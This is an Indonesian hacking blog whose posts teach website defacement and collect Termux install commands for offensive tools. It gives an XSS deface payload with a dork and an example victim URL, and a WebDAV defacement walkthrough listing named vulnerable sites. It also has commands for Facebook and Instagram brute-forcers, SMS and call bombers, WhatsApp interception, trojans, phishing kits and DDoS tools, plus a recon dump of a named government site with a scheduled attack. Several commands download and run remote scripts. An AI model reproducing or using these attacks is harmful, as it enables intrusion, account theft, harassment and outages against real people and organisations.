Cara defece metode poc Xss

Haii sobs berjumpa lagi di blog ./Roy_Ganz.
Ok kali ini saya akan memberikan tutorial cara defece metode poc Xss. Metode ini sangat gampang ya.ok langsung aja kita ke tutorialnya nya ya
Bahan- bahannya ya gays;v
1.Hp/pc
2. Koneksi internet kalo nggak punya kuota jual hp buat beli kuota;v
3. Dork
4. Sabun sesuaikan pas ya lubangnya:v

Langkah"
1.buka crome lalu Dorking dulu ya
Dork:inurl:"/showcatrows.php CategoryID="

2. Pilih salah satu target yang masih perawan ya yang belum di jajah hacker lain. Ouh saya pilih yang ini

3. Kalo sudah ketemu targetnya kalian kasih xploit di belakang link nya ya 
"><marquee><h1>HACKED BY ./ROY_GANZ</h1></marquee>

Contoh:http://www.aktueller-ebookshop.de/showcatrows.php?CategoryID=2"><marquee><h1>HACKED BY ./ROY_GANZ</h1></marquee>

Sampai di sini dulu ya gays Selamat mencoba. Sampai jumpa di blog selanjut nya dadah
Share:

Defece metode apk webdav android

Haii sob berjumpa lagi di blog ./Roy_Ganz
Kali ini saya akan ngasih tutorial cara defece metode webdav ies. Cara defece mengunakan metode apk webdav sangat gampang ya gays.ok langsung aja ke tutorialnya.

Siapkan bahan-bahannya
1.Hp
2.web vuln 
3.apk webdav
4.sc defece
5.dia:'v

Web vuln biar nggak susah" cari;v
opiniong.com
orbfusion.com
ospreygroup.co.za
prorepafrica.com
quintessential-tours.com
rollaslat.com
rooftruss.co.za
saspp.org
savanacloud.com
sieteconsulting.com
southernafricablog.com
stand66.com
tapifare.com
techdirect.co.za
thehellenic.co.za
thepremiummakers.com
totemafrica.com
trafficam.co.za
umkhondo.com
wesiya-com.win24.wadns.net
whadiz.com
whosting.co.za
win24.wadns.net

Langkah" 
1.buka apk webdavnya.untuk yang belum punya bisa di download di link di bawah ini download

2.kalo kalian udah buka apk nya.masukan SC kalian di baris pertama (SC nya taruh di luar folder ya gays)
3.yang baris kedua sama gays Kaya baris pertama
 Contoh: /storage/emulated/0/1115.html

4.baris ketiga masukan targetnya jangan pakai http ya gays
Contoh:contsol.co.za

5.kalo udah seperti tutorial di atas
Tinggal tekan upload aja ya gays
Nanti kalo web udah terdefece nanti 
Baris ke empat akan muncul link saperti contoh:http://constol.co.za/1555.html 

Nah gitu doang sob tutorial nya gampang kan silahkan di coba tinggal ikutin tutotial di atas


Sampai di sini dulu ya sob sampai jumpa di blog selanjutnya dadah.
Share:

kumpulan script termux

Haii sob bercumpa lagi di blog ./Roy_Ganz.
Ok di blog sebelumnya saya memberikan tutorial cara menggunakan termux dengan benar bagi seorang pemula dan di postingan sekarang saya akan memberikan beberapa script termux. Ok langsung aja ke scriptnya.


1. (Hack Facebook)
$ pkg install git python2
$ pip2 install requests
$ git clone https://github.com/Bl4ckDr460n/Black-Fb-Premium
$ cd Black-Fb-Premium
$ python2 Black-Fb.py

2.(Hack fb)
$ pkg update && pkg upgrade -y
$ pkg install python2
$ pkg install git
$ git clone https://github.com/rezadkim/MBFz
$ cd MBFz
$ pip2 install -r nganunymous.txt
$ pip2 install mechanize
$ pip2 install progress
$ python2 mbfz.py

3.(Dark fb new)
$ pkg update && pkg upgradeupgrade
$ pkg install python2
$ pip2 install requests
$ pip2 install mechanize
$ pkg install git
$ git clone https://github.com/ARIYA-CYBER/NEW
$ cd NEW
$ python2 FbNew.py

4.(Hack fb )
$ apt update && apt upgrade
$ pip2 install --upgrade pip
$ pip2 install requests
$ pip2 install mechanize
$ pkg install git
$ git clone https://github.com/blackcodercrush/hack-facebook-teman
$ cd hack-facebook-teman
$ sh requests.sh
$ python2 hack-fb.py

5.(Hack Facebook target )

$ apt update && apt upgrade
$ apt install git
$ apt install python2
$ pip2 install mechanize
$ git clone https://github.com/FR13ND8/BRUTEFORCEnew
$ cd BRUTEFORCEnew
$ sh new.sh

6.(Hack  Facebook Terbaru)*

$ apt update && apt upgrade
$ pkg ins toilet
$ pkg ins figlet
$ pkg ins ruby
$ pkg ins gem
$ gem ins lolcat
$ pkg ins php
$ pkg ins python2
$ pkg ins git
$ git clone https://github.com/Rusmana-ID/rus,
$ cd rus
$ sh v2.sh

rename: Anak
pw: Bangsa

7.(Hack Fb Target New)

------------------------------------------

pkg install git
pkg install python2
pip2 install --upgrade pip
pip2 install mechanize
git clone https://github.com/MRA27/FBNEWV2
cd FBNEWV2
python2 MRA27.py

8.scripst HACK FB NEWW 
(VIP.VPRO) NO LISENSI
∞∞∞≠BY MR.M4RCH3LL≠∞∞∞

$ pkg update && pkg upgrade
$ pkg install git
$ pkg install python2
$ pkg install mechanize
$ pkg install request
$ git clone https://github.com/m4rche3ll-cyber/dark-vpro
$ cd dark-vpro
$ python2 dark-vpro.py

9.(HACK FACEBOOK TARGET)
$pkg update && pkg upgrade
$pkg install python2
$pkg install git
$git clone https://github.com/MRRUXHANTAC270/Facebook-target
$cd Facebook-target
$python2 fb.py

*SILAHKAN DOWNLOAD WORD LIST NYA TERLEBIH DAHULU*
https://sfile.mobi/4UugtYlifYk
Masukin id target ... 
Lalu klik /sdcard/password.txt

10.(Hack FB rombongan)
$ apt update && apt upgrade
$ pkg install python2 git
$ pip2 install mechanize
$ git clone http://github.com/pirmansx/mbf
$ ls
$ cd mbf
$ python2 MBF.py
11.(Hack FB ngincer)
$ apt update ( Enter )
$ apt upgrade ( Enter )
$ apt install python2 ( Enter )
$ pip2 install urllib3 chardet certifi idna requests ( Enter )
$ apt install openssl curl ( Enter )
$ pkg install libcurl ( Enter )
$ ln /sdcard ( Enter ) 
$ cd /sdcard ( Enter )
$ python2 fbbrute.py ( Enter )
------------MAAF SAYA LELAH MEMBERI NOMERNYA JADI LANGSUNG AJA YA GAYS------
Virus perusak hp
$ pkg install python git
$ git clone https://github.com/justahackers/perusak
$ cd perusak
$ python2 perusak.py
Masukkan nomor telpon target
--------------------------
Install G-Dork
*_=====Install G-Dork=====_*
$ pkg install git python2 
$ pip2 install urllib2 urllib 
$ git clone https://github.com/Bl4ckDr460n/G-Dork
$ cd G-Dork
$ python2 G-Dork.py
= Inurl : masukan dork ny
= site   : pilih domain ny contoh *_com,net,id_*
= Max Page : pilih jumlah contoh *_30_*
----------------------
spam Sms
*_=====Spam Sms/Telepon=====_*
$ pkg install git python2
$ pip2 install requests
$ git clone https://github.com/Bl4ckDr460n/SPAMer
$ cd SPAMer
$ python2 SPAMer.py
-----------------------
cek ip saya
*_=====Cek IP saya=====_*
$ pkg install git python2
$ pip2 install requests
$ git clone https://github.com/Bl4ckDr460n/My-Ip
$ cd My-Ip
$ python2 My-Ip.py
--------------------------
senc Trojans
*_=====Send Trojan=====_*
$ pkg install git python2
$ git clone https://github.com/Bl4ckDr460n/STrojans
$ cd STrojans
$ python2 STrojans.py
-----------------------

ddos lucita
$ apt update && apt upgrade
$ pkg install git
$ pkg install python
$ git clone https://github.com/zlucifer/lucita_ddos
$ cd lucita_ddos
$ ls
$ python pukul.py
--------------------
sadap wa
*_=====Sadap WA=====_*
$ pkg install git python2
$ git clone https://github.com/Bl4ckDr460n/HxWhatsApp
$ cd HxWhatsapp
$ python2 HxWhatsApp.py
--------------------------
install botchat
*_====Install BotChat=====_*
$ pkg install git python2
$ pip2 install requests
$ git clone https://github.com/Bl4ckDr460n/BotChat
$ cd BotChat
$ python2 BotChat.py
--------------------------

Encrypt Sc Python
*_====Encrypt Sc Python====_*
$ pkg install git python2
$ git clone https://github.com/Bl4ckDr460n/MarshBase
$ cd MarshBase
$ python2 MarshBase.py
-----------------------
Scan IP Website
*_=====Scan IP Website=====_*
$ pkg install git python2
$ pip2 install requests socket
$ git clone https://github.com/Bl4ckDr460n/ScanIp
$ cd ScanIp
$ python2 scanip.py
-----------------------
Lacak IP
*_=====Lacak IP=====_*
$ pkg install git python2
$ pip2 install requests 
$ git clone https://github.com/Bl4ckDr460n/IP-Location
$ cd IP-Location
$ python2 lacak.py
-----------------------
Tembak Kuota

$apt update && apt upgrade
$apt install bash
$apt install python python2
$apt install php
$apt install git
$git clone https://github.com/MrTamfanX/TembakKuota
$cd TembakKuota
$chmod +x *
$sh IsiKuota.sh
▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬
Hack Pulsa Gratis Via Termux

$apt update && apt upgrade
$apt install php
$apt install toilet
$apt install git
$git clone https://github.com/MrUncle/PulsaGratis
$cd PulsaGratis
$ls
$chmod +x *
$ls
$sh Pulsa.sh
▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬
Hack Bank

$apt update && apt upgrade
$apt install php
$apt install git
$git clone https://github.com/MrUncle/Script-HackBank
$cd Script-HackBank
$ls
$chmod +x *
$ls
$sh ALLBANK

▬▬▬▬▬▬▬
Sadap wa V.6
*_=====Sadap WA=====_*
$ pkg install git python2
$ git clone https://github.com/Bl4ckDr460n/HxWhatsApp
$ cd HxWhatsapp
$ python2 HxWhatsApp.py
-------------------
Hacking
FAKE CALL
$ pkg update && pkg upgrade -y
$ pkg install toilet
$ pkg install openssh
$ pkg install php
$ pkg install nodejs
$ pkg install nodejs-lts
$ pkg install python python2
$ pkg install python2-dev
$ pkg install git
$ pkg install curl
$ pkg install figlet
$ pkg install ruby
$ gem install lolcat
$ git clone https://github.com/T14RB373T/FAKECALL
$ cd FAKECALL
$ bash call.sh
$ 1 
---------------------
Cara hack ig 

$ pkg update
$ pkg upgrade
$ pkg install git 
$ pkg install python python2
$ git clone https://github.com/linuxkukeren/instagram
$ cd instagram
$ pip install -r requirements.txt
$ pip2 install -r requirements.txt
$ python2 linuxkerenhackig.py (nama target) pass.txt
~~~~~~~~~~~~~~~~~~~~~~~~~~~
Hack Instagram
Ok gan nih kode atau kata perintahnya : 
$ pkg update 
$ pkg upgrade 
$ pkg install git 
$ pkg install nano 
$ pkg install cowsay 
$ pkg install figlet 
$ pkg install python2 
$ gem install lolcat 
$ git clone https://github.com/DarkCurut08/DarkCurut08
$ cd DarkCurut08 
$ chmod +x Moreno777.sh
$ sh Moreno77.sh
Jangan Lupa Install Bahan Dlu Di No 8

Termux commands (root) 
$ apt update 
$ apt upgarde 
$ apt install git 
$ git clone https://github.com/thelinuxchoice/instainsane
$ ls 
$ cd instainsane 
$ ls 
$ chmod +x * 
$ ls
$ ./install.sh
$ ./instainsane.sh
Enter user name Now start brute force attack 
Cara hack ig 
$ pkg update
$ pkg upgrade
$ pkg install git 
$ pkg install python python2
$ git clone https://github.com/linuxkukeren/instagram
$ cd instagram
$ pip install -r requirements.txt
$ pip2 install -r requirements.txt
$ python2 linuxkerenhackig.py (nama target) pass.txt
~~~~~~~~~~~~~~~~~~~~~~~~~~~

Hack Instagram lagi 
Ok gan nih kode atau kata perintahnya : 
$ pkg update 
$ pkg upgrade 
$ pkg install git
$ pkg install nano 
$ pkg install cowsay 
$ pkg install figlet 
$ pkg install python2 
$ gem install lolcat 
$ git clone https://github.com/DarkCurut08/DarkCurut08
$ cd DarkCurut08 
$ chmod +x Moreno777.sh
$ sh Moreno77.sh
Jangan Lupa Install Bahan Dlu Di No 8

MBF TOOLS 
$ pkg update (enter) 
$ pkg upgrade (enter) 
$ pkg install python2 (enter) 
$ pip2 install mechanize (enter) 
$ pkg install git (enter) 
$ git clone https://github.com/pirmansx/mbf (enter) 
$ ls (enter) 
$ cd mbf (enter) 
$ ls (enter) 
$ chmod +x MBF.py (enter) 
$ ls (enter) 
$ python2 MBF.py (enter) 
isi formulir yang di berikan 

HAMMER 
$ pkg update (enter) 
$ pkg upgrade (enter) 
$ pkg install python (enter) 
$ pkg install git (enter) 
$ git clone https://github.com/cyweb/hammer (enter) 
$ cd hammer (enter) 
$ ls (enter) 
$ python hammer.py (enter) 
$ python hammer.py -s (nomor IP target) -p 80 -t 135 (enter) 

DEFACE WEBDAV 
$ pkg update (enter) 
$ pkg upgrade (enter) 
$ pkg install wget (enter) 
$ pkg install python2 (enter) 
$ pip2 install urllib3 chardet certifi idna request (enter) 
$ pkg install openssl curl (enter) 
$ pkg install libcurl (enter) 
$ mkdir webdav (enter) 
$ cd webdav (enter) 
$ wget https://pastebin.com/raw/HnVyQPtR (enter) 
$ mv HnVyQPtR webdav.py (enter) 
$ cd /sdcard (enter) 
$ cp (nama script kalian) $HOME/webdav (enter) 
$ cd (enter) 
$ cd webdav (enter) 
$ python2 webdav.py (web target) (script kalian) (enter) 

VIRUS VBUG 
download file http://upfile.mobi/YGwg8gQLuvv 
$ pkg update (enter) 
$ pkg upgrade (enter) 
$ cd /storage/emulated/0 (enter) 
$ ls (enter) 
$ cp -f vbug.zip $HOME (enter) 
$ cd $HOME (enter) 
$ ls (enter) 
$ unzip vbug.zip (enter) 
$ ls (enter) 
$ cd vbug (enter) 
$ python2 vbug.py (enter) 

santet-online
Features :
1.netcat payload
2.fb group hijacking
3.sms-bomber
4.sms-spoof
5.dos attack
Installation :
$ apt update && apt upgrade
$ apt install git 
$ apt install python2
$ apt install python
$ pip2 install requests
$ git clone https://github.com/Gameye98/santet-online
$ cd santet-online
$ chmod +x *
usage :
$ python2 santet.py
Now it shows all tool simply type number to use that tool
*🔰Hack ig🔰*

$ pkg install nano
$ pkg install figlet 
$ pkg install python2
$ pip2 install lolcat 
$ pkg install cowsay
$ pkg install git
$ git clone https://github.com/darkcurut08/darkcurut08
$ cd darkcurut08
$ sh Moreno77.sh

*🔰TOOLS SADAP🔰*

$ apt update && apt upgrade
$ apt install php git
$ apt install bash
$ git clone https://github.com/MrTamfanX/TamfanFacebook
$ cd TamfanFacebook
$ chmod +x *
$ chmod -R 775 lib
$ sh install.sh
$ sh tamfan.sh
_________________________________________
*🔰DDos Attack WI-FI🔰*

$ apt update && apt upgrade
$ apt install python2
$ apt install git
$ $ cd LITEDDOS

Cek:https://ipsaya.com/hostinglokasi.php

$ python2 LITEDDOS.py [IP target] 80 100
_________________________________________
*🔰DDos Attack HP Orang 🔰*

$ apt update && apt upgrade
$ pkg install python2
$ pip2 install mechanize
$ pip2 install request
$ pkg install git
$ git clone https://github.com/R133F/Trojans
$ cd Trojans
$ python2 trojans.py


DDOS WiFi nya masih work

apt update && apt upgrade
apt install php
apt install python2
apt install toilet
apt install git
git clone https://github.com/4L13199/LITESPAM
cd LITESPAM
sh LITESPAM.sh

Oke langsung saja ke penginstalannya.. 
$ apt update && apt upgrade
$ apt install git
$ apt install php
$ apt install figlet
$ apt install toilet
$ apt install python2
$ pip2 install requests
$ pip2 install termcolor
$ git clone https://github.com/DarknessCyberTeam/BAJINGANv6.git
$ cd BAJINGANv6
$ sh BAJINGAN.sh
Masukkan Username Ini username : BAJINGAN
Masukkan Password Ini password :
 Gans
Kumpulan Tools By InYourG00D
Izin promosi biar laku ea 
Nuub Numpang Lewat 
Silahkan Cek https://github.com/InYourG00D1 Disitu Ada Tools Bermanfaat :V
Work gk? lu cobain aja 

÷Kumpulan Kode Unik fb÷
$ pkg install update && pkg install upgrade
$ apt install toilet
$ apt install figlet
$ gem install lolcat
$ pkg install git
$ git clone https://github.com/InYourG00D1/Unix
$ cd Unix
$ sh KD-FB.sh

÷Tools Check BIN÷
$ pkg install update & pkg install upgrade
$ pkg install git
$ git clone https://github.com/InYourG00D1/check
$ cd check
$ php bin.php

÷Tools Spam bom÷
Vitur 
1.Spam bom Bukalapak
2.Spam bom JD-ID
3.Spam Bom PHD
4.Spam Bom Tokoped
5.Spam Bom Hooq
6.Spam Bom KFC
7.Spam bom matahari
*_Totur nya _*
$ pkg install update && pkg install upgrade
$ pkg install toilet
$ pkg install figlet
$ pkg install lolcat
$ pkg install php
$ pkg install python2
$ gem install lolcat
$ pkg install git
$ git clone https://github.com/InYourG00D1/Spam
$ cd Spam
$ sh ms.sh
Kuota free Khusus Tree÷
$ pkg install update && pkg install upgrade
$ apt install toilet
$ apt install figlet
$ gem install lolcat
$ pkg install git
$ git clone https://github.com/InYourG00D1/KuotaFree
$ cd KuotaFree
$ sh 2.sh

÷Pulsa Free work100%÷
$ apt update && apt upgrade
$ pkg install toilet
$ gem install lolcat
$ git clone https://github.com/InYourG00D1/PulsaFree
$ ls
$ cd PulsaFree
$ sh Free.sh

÷Tools Sc Phising All Game÷
Tapi gk semua game juga si :V
$ apt update && apt upgrade
$ apt install figlet
$ apt install toilet
$ gem install lolcat
$ pkg install git
$ git clone https://github.com/InYourG00D1/ScPh1s1ng
$ cd ScPh1s1ng
$ sh 6.sh

÷Kumpulan shell & sc pepes÷
Kalo Ingin Direcode scnya silahkan
Hak cipta Jangan Dirubah Hargai mereka coding gan
Ngecoding Gk Segampang Dapettin Cinta Kamu
$ pkg install update && pkg install upgrade
$ apt install figlet
$ apt install toilet
$ gem install lolcat
$ pkg install git
$ git clone https://github.com/InYourG00D1/Pepescers
$ cd Pepescers
$ sh MTD.sh

Tools ngubah Vidmax jadi Flash÷
Work 100% dicoba aja gan
$ pkg install update
$ pkg install upgrade
$ apt install php
$ pkg install git
$ git clone https://github.com/InYourG00D1/Flash
$ cd Flash
$ php flash.php

÷Tools Nuyul GoPay÷
$ pkg install update
$ pkg install upgrade
$ apt install php
$ pkg install git
$ git clone https://github.com/InYourG00D1/Nuyul-GoPay
$ cd Nuyul-GoPay
$ php Go-Pay.php

÷Tools Install Bkp÷
Yg punya Kontol BuKan Lu doang
Bwahaha
Proses Install nya lumayan lama :V Kalo Mau Cepet Cari Ea Sono 
$ apt update && apt upgrade
$ apt install figlet
$ apt install toilet
$ gem install lolcat
$ pkg install git
$ git clone https://github.com/TumbalGanss/ToolsBkp
$ cd ToolsBkp
$ sh Tobat.sh

÷Tools Installer÷
200 tools 
$ apt update && apt upgrade
$ apt install figlet
$ apt install toilet
$ gem install lolcat
$ pkg install git
$ git clone https://github.com/InYourG00D1/InstallPlerN2
$ cd InstallPlerN2
$ sh InstallPlerV2.sh

÷Tools Script Phising All÷ game,FB,Instagram
$ apt update && apt upgrade
$ apt install figlet
$ apt install toilet
$ gem install lolcat
$ pkg install git
$ git clone https://github.com/InYourG00D1/scPH1S1N9
$ cd scPH1S1N9
$ sh PhisingV2.sh

#shareMhank
#nomor Yg ada Di Tools Udh Gk Aktif
#Ini New Nomer nya : 0895805133060

https://chat.whatsapp.com/Cj0VpOmWpQBJUEQZqqOLn3

[+] Site Title: MyGOV - The Government of Malaysia's Official Portal
[+] *IP address: 150.242.182.57*
[+] Web Server: Apache
[+] CMS: Could Not Detect
[+] Cloudflare: Not Detected
[+] Robots File: Could NOT Find robots.txt!

TARGET IP=150.242.182.57

PORT:80


TARGET WEB=malaysia.gov.my


HARI INI 16-APRIL-2019
JAM 15.00 WIB


TOOL ATTACK?

-=NEW TOOL=-
=================
*Win32 attack*
=================
apt install git
apt install python
apt install bash
apt install toilet
apt install lolcat
git clone https://github.com/BPCATTACKER/DOS-TOOKITS
cd DOS-TOOKITS
sh DoS-TOOKIT.sh

APA YG BARU?
-PERBAIKAN ERROR SAAT MENGIRIM PACKET ATTACK
-DLL

================
DDOS BPC
http://github.com/BLACK-PHANTOM-CYBER/DDOS-BPC/
cd DDOS-BPC
python2 SPOONDDOS.sh
===================
*Ingat sebelum attack harus cek ip dulu karena ip bisa berubah-ubah*
Dgn cara
Ketik di termux

ping malaysia.gov.my

Salam NASIONAL CYBER ASOSSIATION 

LEBIH BAIK MENCOBA DAN GAGAL
DARI PD TIDAK MENCOBA SAMA SEKALI


YG SEBAR GW DOAIN DAPAT PAHALA DAPAT PAHALA

Spam Call Unlimited
$ pkg update && pkg upgrade
$ pkg install php
$ pkg install git
$ git clone https://github.com/Aditya021/SpamCall
$ cd SpamSms
$ php SpamCall.php
Masukan No Target ===>
Mode Banyak (y/n) ===> UNTUK Spam Lebih Dari 1
JumlahSpam ===> Masukan Jumlah yang ingin dispam
*Cara install tool Mr.Rv1.1*
$apt update && apt upgrade
$pkg install git
$pkg install gem
$pkg install figlet
$gem install lolcat
$git clone https://github.com/Mr-R225/Mr.Rv1.1
$cd Mr.Rv1.1
$sh Mr.Rv1.1.sh

tool install
$ apt update && apt upgrade
$ apt install git
$ git clone https://github.com/aryanrtm/4wsectools
cd 4wsectools
chmod 777 tools
./tools

TOOL FSOCIETY
$ git clone https://github.com/manisso/fsociety
$ cd fsociety
$ ./install.sh
$ ls
$ python2 fsociety.py

Assalamualaikum wr.wb
Ni gw bagi SC DARK-FB(VIP-VPRO)
&
Gw bagi2 akun FB untuk kalian 

Ni scripst HACK FB NEWW 
(VIP.VPRO) NO LISENSI
∞∞∞≠BY MR.M4RCH3LL≠∞∞∞

$ pkg update && pkg upgrade
$ pkg install git
$ pkg install python2
$ pkg install mechanize
$ pkg install request
$ git clone https://github.com/m4rche3ll-cyber/dark-vpro
$ cd dark-vpro
$ python2 dark-vpro.py
DDOS ATTACK (TROJAN)

$ apt install git
$ apt install python
$ apt install bash
$ apt install toilet
$ apt install lolcat
$ git clone https://github.com/BPCATTACKER/DOS-TOOKITS
$ cd DOS-TOOKITS
$ sh DoS-TOOKIT.sh

pilih no 1 lalu enter, lalu masukkan ip target dan enter attack sedang berjalan!

DDOS ATTACK

$  pkg update
$  pkg upgrade
$  pkg install python
$  pkg install git
$  git clone https://github.com/cyweb/ 
hammer
$  cd hammer
$  python hammer.py
$  python3 hammer.py -s(ipnya cari sendiri di IP CHACKER) -p 80 -t 135


BOBOL-WIFI( root)

$ apt update && apt upgrade
$ pkg install git
$ git clone https://github.com/esc0rtd3w/wifi-hacker
$ cd wifi-hacker/
$ chmod +x wifi-hacker.sh
$ ./wifi-hacker.sh


HACK CCTV
$ pkg update 
$ pkg upgrade -y 
$ pkg install python2 $ pkg install git 
$ git clone https://github.com/GUNAWAN18ID/cctv.git 
$ pip2 install requests 
$ cd cctv 
$ python2 scanner.py
SPAM CALL 

$ pkg update
$ pkg upgrade
$ pkg install git
$ pkg install python2
$ git clone https://github.com/MRRUXHANTAC270/RUXH4N_SPAM
$ cd RUXH4N_SPAM
$ python2 RUXH4N_SP4M.py8

Pilih nomor target jangan lupa pake (+62) ===>> +6285xxxxx
Pilih jumlah spam ====>>>misal:100
Done :v

DEFACE WEBDAV

$  pkg update && pkg upgrade
$  pkg install bash
$  pkg install git
$  pip2 install termocolor
$  pip2 install lolcat
$  git clone https://github.com/MRRUXHANTAC270/Deface-W3BD4F
$  cd Deface-W3BD4F
$  sh Webdav.sh

Masukan script html




Lalu pilih web vulnya >:)

                Cek 
             👇🏻👇🏻👇🏻

$apt install python2
$apt install git
$apt install php
$apt install bash
$apt install nano
$apt install toilet
$git clone https://github.com/MRRUXHANTAC270/cek
$cd cek
$ls
$sh cek.sh
SCRIPT DEFACE

$apt update && apt upgrade
$apt install python2
$apt install git
$apt install php
$apt install bash
$apt install nano
$apt install toilet
$git clone
https://github.com/MRRUXHANTAC270/scriptdeface
$  cd scriptdeface
$  python2 now.py

SPAM WHATSAPP

$  apt update && apt upgrade
$  apt install python2
$  apt install git
$  apt install php
$  apt install bash
$  git clone https://github.com/MRRUXHANTAC270/sp4m
$  cd sp4m
$  php wa.php


Memper Cantik/Melihat V.Android Termux
$ pkg update && pkg upgrade
$ pkg install ruby cowsay toilet figlet
$ pkg install neofetch
$ pkg install nano
$ gem install lolcat 
$ cd ../usr/etc
$ nano bash.bashrc
cowsay -f eyes Cyber | lolcat
toilet -f standard Indonesia -F gay
neofetch
date | lolcat
Hack Gmail
$ apt-get update && apt-get upgrade
$ apt-get install git
$ apt-get install python python-pip python-setuptools
$ pip install scapy
$ git clone https://github.com/wifiphisher/wifiphisher.git
$ cd wifiphisher<
$ python setup.py install
$ cd wifiphisher
$ python wifiphisher

Nih yang mau hack WiFi Khusus root
$apt update
$apt upgrade
$apt install git
$git clone https://github.com/esc0rtd3w/wifi-hacker
$ls
$cd wifi-hacker
$ls
$chmod +x wifi-hacker.sh
$ls
$./wifi-hacker.sh

cara uninstall tool termux 
rm -rf toolsnya


Bermain moon-buggy
$ pkg install moon-buggy
$ moon-buggy
CHATTING VIA TERMUX
irssi
/connet irc.freenode.net
/nick w3wandroid
/join #modol


$ pkg install irssi
$ irssi
$ /connect chat.freenode.net
$ /nick 1235
12345 di ganti sesuai nama/nick agan
$ /join #XCAteam


PERKIRAAN cuaca
curl http://wttr.in/ (lokasi) 


Browsing di termux
$ pkg install w3m
$ w3m www.google.com
Linknya bsa diubah


Telephone di termux
$ pkg install termux-api
$ termux-telephony-call nomornya


Menampilkan animasi kereta :v
$ pkg install sl
$ sl
menampilkan ikon dan informasi sistem android
$ pkg install neofetch
$ neofetch

menampilkan teks dalam format ASCII
$ pkg install figlet
$ figlet masukin teksnya


MEMUTAR MUSIC DI YOUTUBE VIA TERMUX
$ pip install mps_youtube
$ pip install youtube_dl
$ apt install mpv
$ mpsyt
$ /judul lagu
Tinggal pilih lagu dengan mengetik nomornya

musikan di termux
$ pkg install mpv 
$ mpv/sdcard/lagu.mp3 
/sdcard/ bisa di ganti sesuai letak music

CRACK PASSWORD HASH
$ git clone https://github.com/FajriHidayat088/FHX-Hash-Killer/
$ cd FHX-Hash-Killer
$ python2 FHXHashKiller.py

$ git clone https://github.com/UltimateHackers/Hash-Buster
$ cd Hash-Buster
$ python2 hash.py

ASCII ART MAPS
- pkg install update && upgrade
- pkg install perl
- git clone https://github.com/x-xsystm/maps.git
- cd kaos
- perl maps.pl
- untuk Zoom tekan A
- Password: (pejuang212)

CARA MENGHIAS TAMPILAN TERMUX
$ pkg update && pkg upgrade
$ pkg install ruby cowsay toilet figlet
$ pkg install neofetch
$ pkg install nano
$ pkg install ncurses-utils
$ pkg install ruby
$ pkg install lolcat
$ pkg install cowsay
$ gem install lolcat
$ nano .bashrc

clear
blue='\e[1;34m'
green='\e[1;32m'
purple='\e[1;35m'
cyan='\e[1;36m'
red='\e[1;31m'
white='\e[1;37m'
yellow='\e[1;33m'
NOW=`date "+%d.%m.%Y"`
TIME=`date "+%H:%M"`
cowsay -f eyes **Welcome To MRCX hacking tool** | lolcat
toilet -f standard " **MRCX** " -F gay
neofetch
echo " Time : " $TIME | lolcat
date | lolcat
echo
echo Username : marcyber team | lolcat
echo Hostname : @MRCX~#root_system | lolcat
echo
echo @localhost:~# | lolcat
echo root@localhost:~$ | lolcat
echo -e $green
echo root@MRCX:~$
VBugMaker Termux
-apt update && apt upgrade
-apt install git
-apt install python
Donwload file ->http://upfile.mobi/YGwg8gQLuvv
Pindah ke directory
Next
-unzip vbug.zip
-mv vbug $HOME
-cd vbug
-ls
-chmod +x vbug.py
-python2 vbug.py
#Done 


BOOM SPAM DI TERMUX
apt upgrade && apt update
apt install git 
git clone https://github.com/Amriez/gcospam
cd gcospam
sh install.sh
sh gco.sh
Pilih nomer yang mana ajjh 
Lalu
Masukan nomer tanpa 0/62
Input bebas
Jeda default aja

Spam bom mall
$ pkg install update 
$ pkg install upgrade
$ pkg install wget
$ pkg install php
$ wget http://files-store.theprivat.ml/uploads/bom-mall.zip
$ unzip bom-mall.zip
$ cd bom-mall
$ php run.php

(Install *SpamTsel*)
$ pkg install curl 
$ pkg install php 
$ curl -s http://files-store.theprivat.ml/uploads/bombtsel.txt > bombtsel.php 
$ chmod 777 bombtsel.php
$ php bombtsel.php
3) Tool Spam LITESPAM
$ pkg install php
$ pkg install toilet
$ pkg install sh

LITESPAM
$ pkg install git
$ git clone https://github.com/4L13199/LITESPAM
$ cd LITESPAM
$ sh LITESPAM.sh atau 
bash LITESPAM.sh
Masukan Nomer nya... 

Spammer GRAB
$pkg install python2
$pip2 install requests
$pkg install git
$git clone http://github.com/p4kl0nc4t/Spammer-Grab
$cd Spammer-Grab
$python2 spammer.py nomor hp korban --delay 30

spam sms jdid
1.PKG install PHP
2.pkg install cURL
3.curl https://pastebin.com/raw/9BYy1 JVc -o jdid.php
4.php jdid.php


Hacking spammer by seni
$apt update && apt upgrade
$apt install python2 php
$pip2 install requests
$apt install nano
$apt install git
$git clone https://github.com/Senitopeng/
SpamSms.git
$cd SpamSms
$python2 mantan.py


HACKING DAN TRICK FB VIA TERMUX 

AUTO BOOT FACEBOOK 
$ git clone https://github.com/Senitopeng/BotFbBangDjon.git
$ cd BotFbBangDjon
$ python2 bangdjon.py

Cara crack id fb 
https://findmyfbid.in/

git clone https://github.com/tomiashari/fb-autoreaction.git
cd fb-autoreaction
python2 fb-autoreaction

HACKING THOOLS MBF FACEBOOK
$ pkg update && upgrade
‬$ pkg update && upgrade
$ pkg install python2
$ pkg install git
$ git clone https://github.com/pirmansx/mbf
$ cd mbf
$ python2 MBF.py

Ok sob sampai di sini aja ya maaf kalo scriptnya ada yang work 😁 sampai jumpa diblog selanjutnya ya dadah
Share:

cara menggunakan termux

Cara menggunakan termux

Haii sobs berjumpa lagi di blog ./Roy_Ganz 
Ok kali ini saya akan memberikan tutorial cara menggunakan termux dengan benar bagi pemula 
Termux 



Aplikasi tersebut mempunyai nama Termux (beta), yang mempunyai kegunaan guna mengatur, memanipulasi sistem emulator pada Android yang anda.

Aplikasi Termux diluncurkan oleh seorang yang mempunyai nama Fredik Fornwall loh, untuk yang tidak tahu siapa dia boleh ditelusuri digoogle. Untuk anak IT tentu tau Termux . ok langsung aja ke toturialnya

Kalian harus download termux di play store size termux cuma sedikit.
Kalo termux.perlu koneksi yang bagus untuk menjalankan sistem termux.

Di termux terdapat banyak kode perintah 
Seperti pkg upgrade, pkg install,cd,chmod,clear dll

Jika termux kalian sudah terinsall.kalian langsung aja buka termuxnya tampilan pertama akan seperti gambar di bawah ini
Tambahan tanda $ sebagai patokan mengetik kode perintah dan jika muncul [y/n] kalian ketik y. Menjalan kan termux sangat mudah tinggal ketik kode perintah lalu tekan enter.

Pertama kita ketik kode perintah di bawah ini

Pkg install && pkg upgrade (enter)
Pkg install python2 (enter)
Pkg install git (enter)
Pkg install php (enter)
Pip2 install requets (enter)
Pip2 install mechanize (enter)

Nah pemasangan alat dan perintah sudah selesai kalian tinggal masukan script termuxnya.
